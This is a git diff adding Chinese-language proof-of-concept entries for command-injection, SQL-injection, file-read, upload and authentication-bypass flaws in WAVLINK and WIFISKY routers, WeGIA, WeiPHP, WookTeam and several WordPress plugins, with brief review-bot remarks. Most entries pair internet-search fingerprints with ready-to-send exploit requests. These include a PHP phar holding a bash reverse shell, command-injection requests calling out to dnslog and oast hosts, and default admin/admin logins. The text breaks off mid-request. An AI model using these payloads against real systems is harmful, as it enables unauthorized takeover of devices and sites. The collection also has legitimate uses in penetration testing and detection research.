b/WAVLINKmesh.cgi命令执行漏洞(CVE-2022-2486).md 
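Review bot: `GET /cgi-bin/live_api.cgi?page=abc&id=173&ip=;id;` has three parameters and the text explains none; say whether `page=abc` and `id=173` are arbitrary or must be these values, since a reader who gets a non-vulnerable response cannot tell what to vary. The 漏洞简介 says `多款路由器` but, unlike the adm.cgi entry, names no models; add them. The attachment name `wanlink-router-live-api-cgi-rce.yaml` misspells wavlink.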
@@ -0,0 +1,51 @@ +# WAVLINK mesh.cgi命令执行漏洞(CVE-2022-2486) + +# 一、漏洞简介 +WAVLINK是中国睿因科技(WAVLINK)公司开发的一款路由器,该系统mesh.cgi文件存在命令执行漏洞,攻击者可通过该漏洞获取服务器权限。包含型号WN530HG4、WN531G3、WN572HG3、WN535G3、WN575A4等。 + +# 二、影响版本 ++ wavlink 路由器 + +# 三、资产测绘 ++ hunter`web.body="firstFlage"` ++ 特征 + +![1703226837131-abc67852-1626-482a-982b-2f8f69837f2c.png](./img/2z5YOmq5xdN4GgtQ/1703226837131-abc67852-1626-482a-982b-2f8f69837f2c-764354.png) + +# 四、漏洞复现 +```java +GET /cgi-bin/mesh.cgi?page=upgrade&key=';ls>./1.txt;' HTTP/1.1 +Host: {hostname} +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +``` + +![1703227123408-ad76b97b-fbb5-48b3-a932-877f8d037798.png](./img/2z5YOmq5xdN4GgtQ/1703227123408-ad76b97b-fbb5-48b3-a932-877f8d037798-976428.png) + +获取命令执行结果 + +```java +GET /cgi-bin/1.txt HTTP/1.1 +Host: {hostname} +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +``` + +![1703227153612-9f8d4f5b-341e-4c8a-bfed-f618c459f555.png](./img/2z5YOmq5xdN4GgtQ/1703227153612-9f8d4f5b-341e-4c8a-bfed-f618c459f555-527638.png) + +nuclei脚本 + +[wanlink-router-mesh-cgi-rce.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709222231422-206fa714-944a-44f8-b5df-ab0069039061.yaml) + + + +> 更新: 2024-02-29 23:57:11 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/wnwb9zre4ushwzb8> \ No newline at end of file 
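Review bot: the payload `key=';ls>./1.txt;'` writes `1.txt` into `/cgi-bin/` and the second request reads it back, but there is no cleanup step; add an `rm` or a check that leaves nothing on the device. The entry does not say why the result has to go through a file instead of being echoed as in the adm.cgi and live_api.cgi entries; one sentence would help. The attachment name `wanlink-router-mesh-cgi-rce.yaml` misspells wavlink.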
diff --git a/WAVLINKnightled.cgi命令执行漏洞(CVE-2022-2487).md b/WAVLINKnightled.cgi命令执行漏洞(CVE-2022-2487).md new file mode 100644 index 0000000..8cd88ce --- /dev/null +++ b/WAVLINKnightled.cgi命令执行漏洞(CVE-2022-2487).md @@ -0,0 +1,40 @@ +# WAVLINK nightled.cgi命令执行漏洞(CVE-2022-2487) + +# 一、漏洞简介 +WAVLINK是中国睿因科技(WAVLINK)公司开发的一款路由器,该系统nightled.cgi文件存在命令执行漏洞,攻击者可通过该漏洞获取服务器权限。包含型号WN530HG4、WN531G3、WN572HG3、WN535G3、WN575A4等。 + +# 二、影响版本 ++ wavlink 路由器 + +# 三、资产测绘 ++ hunter`web.body="firstFlage"` ++ 特征 + +![1703226837131-abc67852-1626-482a-982b-2f8f69837f2c.png](./img/Rx--2uKs5UATt6Ld/1703226837131-abc67852-1626-482a-982b-2f8f69837f2c-514022.png) + +# 四、漏洞复现 +```java +POST /cgi-bin/nightled.cgi HTTP/1.1 +Host: {hostname} +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 51 + +page=night_led&start_hour=;id; +``` + +![1703227926824-33cc9c9a-e440-48db-872e-8e7dfe23d5ed.png](./img/Rx--2uKs5UATt6Ld/1703227926824-33cc9c9a-e440-48db-872e-8e7dfe23d5ed-728776.png) + +nuclei脚本 + +[wanlink-router-nightled-cgi-rce.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709222231412-9b8a48ea-e19e-4635-93d4-e8e9113dabfa.yaml) + + + +> 更新: 2024-02-29 23:57:11 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gt5g5cgio0f29oaf> \ No newline at end of file diff --git a/WIFISKY7层流控路由器confirm存在命令执行漏洞.md b/WIFISKY7层流控路由器confirm存在命令执行漏洞.md new file mode 100644 index 0000000..435f62d --- /dev/null +++ b/WIFISKY7层流控路由器confirm存在命令执行漏洞.md 
@@ -0,0 +1,57 @@ +# WIFISKY 7层流控路由器confirm存在命令执行漏洞 + +# 一、漏洞简介 +WIFISKY-7层流控路由器是深圳市领空技术有限公司(简称“领空技术")的一款产品,深圳市领空技术有限公司是扎根深圳辐射的网络通讯设备供应商,致力于网络通讯设备产品的研究与开发。WIFISKY 7层流控路由器 confirm 接口存在一个命令执行漏洞,使得攻击者可以通过构造特定的请求远程执行恶意代码。此漏洞可能导致攻击者获取系统权限、执行任意命令,严重威胁系统的机密性和完整性。 + +# 二、影响版本 ++ WIFISKY-7层流控路由器 + +# 三、资产测绘 ++ fofa`title="WIFISKY 7层流控路由器"` ++ 特征 + +![1715173367617-aaada69e-bcaf-4f05-8166-b5ff817cdcfe.png](./img/FCIn4YzdQmapH-Qa/1715173367617-aaada69e-bcaf-4f05-8166-b5ff817cdcfe-024206.png) + +# 四、漏洞复现 +```http +GET /notice/confirm.php?t=;sleep%203 HTTP/1.1 +Host: +Cookie: SESSID=e2cc8cfb14aa1d77ffcfc93204a1d57b +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 +Te: trailers +Connection: close +``` + +![1715173433508-2e7146ea-18f4-45ff-8d01-238623ada4e0.png](./img/FCIn4YzdQmapH-Qa/1715173433508-2e7146ea-18f4-45ff-8d01-238623ada4e0-359859.png) + +```http +GET /notice/confirm.php?t=;ping%20ofo3df.dnslog.cn HTTP/1.1 +Host: +Cookie: SESSID=e2cc8cfb14aa1d77ffcfc93204a1d57b +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 +Te: trailers +Connection: close +``` + +![1715173494704-e184b918-38a2-45ce-a6ec-4a26f9712427.png](./img/FCIn4YzdQmapH-Qa/1715173494704-e184b918-38a2-45ce-a6ec-4a26f9712427-455592.png) + + + +> 更新: 2024-05-14 11:23:33 +> 
原文: <https://www.yuque.com/xiaokp7/ocvun2/rgxgp78mynikfbld> \ No newline at end of file diff --git a/WIFISKY7层流控路由器index存在命令执行漏洞.md b/WIFISKY7层流控路由器index存在命令执行漏洞.md new file mode 100644 index 0000000..612a3e7 --- /dev/null +++ b/WIFISKY7层流控路由器index存在命令执行漏洞.md @@ -0,0 +1,32 @@ +# WIFISKY 7层流控路由器index存在命令执行漏洞 + +# 一、漏洞简介 +WIFISKY-7层流控路由器是深圳市领空技术有限公司(简称“领空技术")的一款产品,深圳市领空技术有限公司是扎根深圳辐射的网络通讯设备供应商,致力于网络通讯设备产品的研究与开发。WIFISKY 7层流控路由器 index 接口存在一个命令执行漏洞,使得攻击者可以通过构造特定的请求远程执行恶意代码。此漏洞可能导致攻击者获取系统权限、执行任意命令,严重威胁系统的机密性和完整性。 + +# 二、影响版本 ++ WIFISKY-7层流控路由器 + +# 三、资产测绘 ++ fofa`title="WIFISKY 7层流控路由器"` ++ 特征 + +![1715173367617-aaada69e-bcaf-4f05-8166-b5ff817cdcfe.png](./img/lbdF8AT5TnJVh0_m/1715173367617-aaada69e-bcaf-4f05-8166-b5ff817cdcfe-551146.png) + +# 四、漏洞复现 +```http +POST /portal/ibilling/index.php HTTP/1.1 +Host: +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 + +{"type":5,"version":2,"bypass":";wget guzyybmley.dgrh3.cn"} +``` + +![1717868463587-8eea369e-a6b5-488c-85d3-0242dd3f45d6.png](./img/lbdF8AT5TnJVh0_m/1717868463587-8eea369e-a6b5-488c-85d3-0242dd3f45d6-720469.png) + +![1717868416844-14f8d78b-79b8-4b06-8a9a-4e0c81dfea9b.png](./img/lbdF8AT5TnJVh0_m/1717868416844-14f8d78b-79b8-4b06-8a9a-4e0c81dfea9b-880444.png) + + + +> 更新: 2024-06-11 10:28:14 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gogz90zifcvt0b1o> \ No newline at end of file diff --git a/WIFISKY7层流控路由器jumper存在命令执行漏洞.md b/WIFISKY7层流控路由器jumper存在命令执行漏洞.md new file mode 100644 index 0000000..e3b75dc --- /dev/null +++ b/WIFISKY7层流控路由器jumper存在命令执行漏洞.md 
@@ -0,0 +1,57 @@ +# WIFISKY 7层流控路由器jumper存在命令执行漏洞 + +# 一、漏洞简介 +WIFISKY-7层流控路由器是深圳市领空技术有限公司(简称“领空技术")的一款产品,深圳市领空技术有限公司是扎根深圳辐射的网络通讯设备供应商,致力于网络通讯设备产品的研究与开发。WIFISKY 7层流控路由器 jumper 接口存在一个命令执行漏洞,使得攻击者可以通过构造特定的请求远程执行恶意代码。此漏洞可能导致攻击者获取系统权限、执行任意命令,严重威胁系统的机密性和完整性。 + +# 二、影响版本 ++ WIFISKY-7层流控路由器 + +# 三、资产测绘 ++ fofa`title="WIFISKY 7层流控路由器"` ++ 特征 + +![1715173367617-aaada69e-bcaf-4f05-8166-b5ff817cdcfe.png](./img/Oead-PjWp865K9ib/1715173367617-aaada69e-bcaf-4f05-8166-b5ff817cdcfe-078523.png) + +# 四、漏洞复现 +```http +GET /notice/jumper.php?t=;sleep%203 HTTP/1.1 +Host: +Cookie: SESSID=e2cc8cfb14aa1d77ffcfc93204a1d57b +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 +Te: trailers +Connection: close +``` + +![1715173637857-4aaac66b-8ff2-4825-a42c-69652583edd7.png](./img/Oead-PjWp865K9ib/1715173637857-4aaac66b-8ff2-4825-a42c-69652583edd7-056223.png) + +```http +GET /notice/jumper.php?t=;ping%20h6n6s2.dnslog.cn HTTP/1.1 +Host: +Cookie: SESSID=e2cc8cfb14aa1d77ffcfc93204a1d57b +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 +Te: trailers +Connection: close +``` + +![1715173681881-5c92bdfd-9347-4e56-aef0-31a903b916b5.png](./img/Oead-PjWp865K9ib/1715173681881-5c92bdfd-9347-4e56-aef0-31a903b916b5-767536.png) + + + +> 更新: 2024-05-14 11:23:44 +> 原文: 
<https://www.yuque.com/xiaokp7/ocvun2/ged48gfhow3bphsa> \ No newline at end of file diff --git a/WIFISKY7层流控路由器存在后台命令执行漏洞.md b/WIFISKY7层流控路由器存在后台命令执行漏洞.md new file mode 100644 index 0000000..b3dee4d --- /dev/null +++ b/WIFISKY7层流控路由器存在后台命令执行漏洞.md @@ -0,0 +1,33 @@ +# WIFISKY 7层流控路由器存在后台命令执行漏洞 + +# 一、漏洞简介 +WIFISKY-7层流控路由器是深圳市领空技术有限公司(简称“领空技术")的一款产品,深圳市领空技术有限公司是扎根深圳辐射的网络通讯设备供应商,致力于网络通讯设备产品的研究与开发。WIFISKY 7层流控路由器存在后台命令执行漏洞 + +# 二、影响版本 ++ WIFISKY-7层流控路由器 + +# 三、资产测绘 ++ fofa`title="WIFISKY 7层流控路由器"` ++ 特征 + +![1715173367617-aaada69e-bcaf-4f05-8166-b5ff817cdcfe.png](./img/q1vw9flS-_qCQfPi/1715173367617-aaada69e-bcaf-4f05-8166-b5ff817cdcfe-517299.png) + +# 四、漏洞复现 +通过弱口令登录系统 + +```http +admin/admin +``` + +使用弱口令登录后台,在系统维护->命令控制台中进行执行命令 + +```http +ifconfig && id +``` + +![1717871175515-28ecddaf-64c1-4337-9e95-939d6b760612.png](./img/q1vw9flS-_qCQfPi/1717871175515-28ecddaf-64c1-4337-9e95-939d6b760612-257040.png) + + + +> 更新: 2024-06-11 10:28:14 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/em1kq8wstwsanpz7> \ No newline at end of file diff --git a/WIFISKY7层流控路由器存在弱口令漏洞.md b/WIFISKY7层流控路由器存在弱口令漏洞.md new file mode 100644 index 0000000..9a4af59 --- /dev/null +++ b/WIFISKY7层流控路由器存在弱口令漏洞.md @@ -0,0 +1,25 @@ +# WIFISKY 7层流控路由器存在弱口令漏洞 + +# 一、漏洞简介 +WIFISKY-7层流控路由器是深圳市领空技术有限公司(简称“领空技术")的一款产品,深圳市领空技术有限公司是扎根深圳辐射的网络通讯设备供应商,致力于网络通讯设备产品的研究与开发。WIFISKY 7层流控路由器存在弱口令漏洞。 + +# 二、影响版本 ++ WIFISKY-7层流控路由器 + +# 三、资产测绘 ++ fofa`title="WIFISKY 7层流控路由器"` ++ 特征 + +![1715173367617-aaada69e-bcaf-4f05-8166-b5ff817cdcfe.png](./img/nDrG3JUk7KVvfWzn/1715173367617-aaada69e-bcaf-4f05-8166-b5ff817cdcfe-260197.png) + +# 四、漏洞复现 +```http +admin/admin +``` + +![1717866986320-ce91af60-dfc6-433a-a7b0-49f5359eced7.png](./img/nDrG3JUk7KVvfWzn/1717866986320-ce91af60-dfc6-433a-a7b0-49f5359eced7-008493.png) + + + +> 更新: 2024-06-11 10:28:14 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xovl7d0wfl2x9txr> \ No newline at end of file 
diff --git a/WeGIA存在前台任意文件上传漏洞.md b/WeGIA存在前台任意文件上传漏洞.md new file mode 100644 index 0000000..9a3bc4d --- /dev/null +++ b/WeGIA存在前台任意文件上传漏洞.md @@ -0,0 +1,38 @@ +# WeGIA存在前台任意文件上传漏洞 + +**WeGIA是一个福利机构管理器,并且具有一下几种功能,并且在3.2.8及之前版本都存在前台任意文件上传漏洞,且都可进行直接上传Phar等文件执行任意命令,反弹Shell等操作。** + +## fofa + +```javascript +"./assets/vendor/select2/select2.js" +``` + +## poc + +phar内容 + +```php +<?php +$ip = 'IP'; +$port = 4444; +system("/bin/bash -c 'bash -i >& /dev/tcp/$ip/$port 0>&1'"); +?> + +``` + +将phar文件上传 + +```javascript +/WeGIA/html/socio/sistema/controller/controla_xlsx.php +``` + +![image-20250127154942138](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202501271549223.png) + +上传后,文件在 /WeGIA/html/socio/sistema/tabelas/shell.phar + +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202501271550801.png) + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/GhaxwVBzJKHf0AucOU6hbw \ No newline at end of file diff --git a/WeiPHP微信开发框架Notice_index接口处存在远程代码执行漏洞.md b/WeiPHP微信开发框架Notice_index接口处存在远程代码执行漏洞.md new file mode 100644 index 0000000..bcbc96a --- /dev/null +++ b/WeiPHP微信开发框架Notice_index接口处存在远程代码执行漏洞.md 
@@ -0,0 +1,49 @@ +# WeiPHP微信开发框架Notice/index接口处存在远程代码执行漏洞 + +# 一、漏洞简介 +WeiPHP是一款基于PHP开发的开源微信公众号开发框架。它提供了丰富的功能和易于使用的接口,使开发者能够快速构建和管理微信公众号应用。WeiPHP支持自定义菜单、消息管理、用户管理、素材管理、支付接口等功能,同时还提供了插件机制和模块化开发,方便扩展和定制。WeiPHP是一个成熟的框架,被广泛应用于微信公众号开发领域。WeiPHP Notice/index接口处存在远程代码执行漏洞,恶意攻击者可能会利用此漏洞执行恶意命令,可能会导致敏感信息泄露或者服务器失陷。 + +# <font style="color:rgb(0, 0, 0);">二、影响版本</font> ++ <font style="color:rgb(36, 41, 46);background-color:rgb(248, 248, 248);">WeiPHP微信开发框架</font> + +# 三、资产测绘 ++ fofa: `<font style="color:rgb(36, 41, 46);background-color:rgb(248, 248, 248);">body="/css/weiphp.css" || title="weiphp" || title="weiphp4.0" </font>` ++ hunter:`<font style="color:rgb(36, 41, 46);background-color:rgb(248, 248, 248);"> app.name="weiphp"</font>` ++ 特征![1712767294333-f9397fc0-6329-4dc2-a72e-83464dd6b5c2.png](./img/wzsbo6eygrGh40i-/1712767294333-f9397fc0-6329-4dc2-a72e-83464dd6b5c2-055186.png) + +# 四、漏洞复现 +```java +POST /public/index.php/weixin/Notice/index?img=echo+md5(789);exit(); HTTP/1.1 +Host: 127.0.0.1 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Content-Length: 0 + +<xml> +<product_id>aaaa</product_id> +<appid>exp</appid> +<appid>=0) union select 1,2,3,4,5,6,7,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,9,10,11,12-- </appid> +<mch_id>aaa</mch_id> +<nonce_str>aaa</nonce_str> +<openid>aaa</openid> +</xml> +``` + + + +![1712767557239-9a1def0e-1f58-41eb-a642-051f31707807.png](./img/wzsbo6eygrGh40i-/1712767557239-9a1def0e-1f58-41eb-a642-051f31707807-441317.png) + +```java +68053af2923e00204c3ca7c6a3150cf7 +``` + +![1712767762677-42a5be51-6ee4-4c82-af10-a882880fc2b0.png](./img/wzsbo6eygrGh40i-/1712767762677-42a5be51-6ee4-4c82-af10-a882880fc2b0-063880.png) + +![1712767598316-ce095c0c-d845-4dd2-ace5-377ecb467012.png](./img/wzsbo6eygrGh40i-/1712767598316-ce095c0c-d845-4dd2-ace5-377ecb467012-669483.png) + 
+[weiphp.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1713623246456-79b26a39-f9b2-48d5-b784-34d89bcd5bfa.yaml) + + + +> 更新: 2024-04-20 22:27:26 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fhggt0ihwa4s9n1a> \ No newline at end of file diff --git a/WinRAR-CVE-2023-38831.md b/WinRAR-CVE-2023-38831.md new file mode 100644 index 0000000..3fbc367 --- /dev/null +++ b/WinRAR-CVE-2023-38831.md @@ -0,0 +1,7 @@ + +## CVE-2023-38831 + +## 漏洞复现 +``` +https://mp.weixin.qq.com/s/UXWW7nuu52r7p6x9R3EcNA +``` diff --git a/WookTeamsearchinfo存在SQL注入漏洞.md b/WookTeamsearchinfo存在SQL注入漏洞.md new file mode 100644 index 0000000..aab23f0 --- /dev/null +++ b/WookTeamsearchinfo存在SQL注入漏洞.md @@ -0,0 +1,27 @@ +# WookTeam searchinfo存在SQL注入漏洞 + +# 一、漏洞简介 +WookTeam是一款轻量级的开源在线团队协作工具,提供各类文档协作工具、在线思维导图、在线流程图、项目管理、任务分发、即时IM,知识库管理等工具。WookTeam接口searchinfo存在SQL注入漏洞 + +# 二、影响版本 ++ WookTeam + +# 三、资产测绘 +```plain +title="Wookteam" +``` + +![1723565393982-8aeb7f0d-5fe1-4076-a035-5aed15fa18e4.png](./img/JZaYfNdClRdp56X9/1723565393982-8aeb7f0d-5fe1-4076-a035-5aed15fa18e4-952469.png) + +# 四、漏洞复现 +```plain +GET /api/users/searchinfo?where[username]=1%27%29+UNION+ALL+SELECT+NULL%2CCONCAT%280x7e%2Cversion%28%29%2C0x7e%29%2CNULL%2CNULL%2CNULL%23 HTTP/1.1 +Host: +``` + +![1723565359190-f3c20851-b4e8-45d4-8716-b8b370ef4c3c.png](./img/JZaYfNdClRdp56X9/1723565359190-f3c20851-b4e8-45d4-8716-b8b370ef4c3c-341062.png) + + + +> 更新: 2024-09-05 23:21:35 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ocbt8satalaaymlq> \ No newline at end of file diff --git a/WookTeam轻量级的团队在线协作系统接口searchinfo存在SQL注入漏洞.md b/WookTeam轻量级的团队在线协作系统接口searchinfo存在SQL注入漏洞.md new file mode 100644 index 0000000..bdce5a0 --- /dev/null +++ b/WookTeam轻量级的团队在线协作系统接口searchinfo存在SQL注入漏洞.md 
@@ -0,0 +1,25 @@ +# WookTeam轻量级的团队在线协作系统接口searchinfo存在SQL注入漏洞 + +WookTeam /api/users/searchinfo 接口存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。 + +## fofa + +```yaml +title="Wookteam" +``` + +## poc + +```java +GET /api/users/searchinfo?where[username]=1%27%29+UNION+ALL+SELECT+NULL%2CCONCAT%280x7e%2Cuser%28%29%2C0x7e%29%2CNULL%2CNULL%2CNULL%23 HTTP/1.1 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cache-Control: max-age=0 +Connection: keep-alive +Host: your-ip +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 +``` + +![image-20240814095848331](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408140959983.png) \ No newline at end of file diff --git a/WordPress-Automatic-Plugin任意文件下载漏洞(CVE-2024-27954).md b/WordPress-Automatic-Plugin任意文件下载漏洞(CVE-2024-27954).md new file mode 100644 index 0000000..846ae6a --- /dev/null +++ b/WordPress-Automatic-Plugin任意文件下载漏洞(CVE-2024-27954).md @@ -0,0 +1,19 @@ +## WordPress Automatic Plugin任意文件下载漏洞(CVE-2024-27954) + +## fofa +``` +"/wp-content/plugins/wp-automatic" +``` + +## poc +``` +GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 +Connection: close +Accept: */* +Accept-Language: en +Accept-Encoding: gzip +``` + +![8053915951936ca9109843fe4c581ce4](https://github.com/wy876/POC/assets/139549762/f5c6497f-29f9-47de-aa15-f072541a1d1b) diff --git a/WordPress插件Bricks-Builder存在RCE漏洞(CVE-2024-25600).md b/WordPress插件Bricks-Builder存在RCE漏洞(CVE-2024-25600).md new file mode 100644 index 0000000..35c3b6b --- /dev/null 
+++ b/WordPress插件Bricks-Builder存在RCE漏洞(CVE-2024-25600).md @@ -0,0 +1,49 @@ +## WordPress插件Bricks Builder存在RCE漏洞(CVE-2024-25600) + +## zoomeye +``` +web.body="/wp-content/themes/bricks/" +``` + +## poc + +### 获取nonce值 +``` +GET / HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:96.0) Gecko/20100101 Firefox/96.0 +Connection: close +Accept-Encoding: gzip, deflate +``` +![f8692e900e34adeb6f8b23677258b8e1](https://github.com/wy876/POC/assets/139549762/656552ce-28a6-407a-b746-56bd36ea3eb0) + +### rce +``` +POST /wp-json/bricks/v1/render_element HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0 +Connection: close +Content-Length: 401 +Content-Type: application/json +Accept-Encoding: gzip, deflate + +{ + "postId": "1", + "nonce": "c5b5949**", + "element": { + "name": "container", + "settings": { + "hasLoop": "true", + "query": { + "useQueryEditor": true, + "queryEditor": "ob_start();echo `curl cnc4ej5blq62an78ck6giyhcffmdr5t56.oast.pro`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);", + "objectType": "post" + } + } + } +} +``` +![78880674cd49cefc6d5787c30efaf8cd](https://github.com/wy876/POC/assets/139549762/986bebf0-4369-462b-923c-775434318338) + +## 漏洞分析 +- https://xz.aliyun.com/t/13833 diff --git a/WordPress插件Crypto身份认证绕过漏洞复现(CVE-2024-9989).md b/WordPress插件Crypto身份认证绕过漏洞复现(CVE-2024-9989).md new file mode 100644 index 0000000..ac4f2c1 --- /dev/null +++ b/WordPress插件Crypto身份认证绕过漏洞复现(CVE-2024-9989).md 
@@ -0,0 +1,30 @@ +# WordPress插件Crypto身份认证绕过漏洞复现(CVE-2024-9989) + +WordPress 的 Crypto 插件在 2.15 及以下版本(包括 2.15)中容易受到身份验证绕过攻击。这是由于对 'crypto_connect_ajax_process' 函数中 'crypto_connect_ajax_process::log_in' 函数的任意方法调用有限。这使得未经身份验证的攻击者可以以站点上的任何现有用户(例如管理员)身份登录(如果他们有权访问用户名) + +## fofa +```javascript +"wp-content/plugins/crypto/" +``` + +## poc +```javascript +GET /wp-admin/admin-ajax.php?action=crypto_connect_ajax_process&method_name=register¶m1=admin HTTP/1.1 +Host: 127.0.0.1 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +``` + +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202501041352219.webp) + +**成功会显示Success 并赋予Cookie 然后再访问/wp-admin 即可登入管理账号.** + +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202501041352673.webp) + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/hC8A1DeS-LWGpNIFKeiMBQ \ No newline at end of file diff --git a/WordPress插件ElementorPageBuilder存在文件读取漏洞(CVE-2024-9935).md b/WordPress插件ElementorPageBuilder存在文件读取漏洞(CVE-2024-9935).md new file mode 100644 index 0000000..f5f4950 --- /dev/null +++ b/WordPress插件ElementorPageBuilder存在文件读取漏洞(CVE-2024-9935).md 
@@ -0,0 +1,21 @@ +# WordPress插件ElementorPageBuilder存在文件读取漏洞(CVE-2024-9935) +<font style="color:rgb(51, 51, 51);">WordPress是一款免费开源的内容管理系统(CMS),最初是一个博客平台,但后来发展成为一个功能强大的网站建设工具,适用于各种类型的网站,包括个人博客、企业网站、电子商务网站等,并逐步演化成一款内容管理系统软件。Wordpress ElementorPageBuilder插件存在文件读取漏洞(CVE-2024-9935)</font> + +## fofa +```javascript +body="wp-content/plugins/pdf-generator-addon-for-elementor-page-builder/" +``` + +## poc +```plain +GET /elementor-84/?rtw_generate_pdf=true&rtw_pdf_file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0 +Accept: */* +Accept-Language: 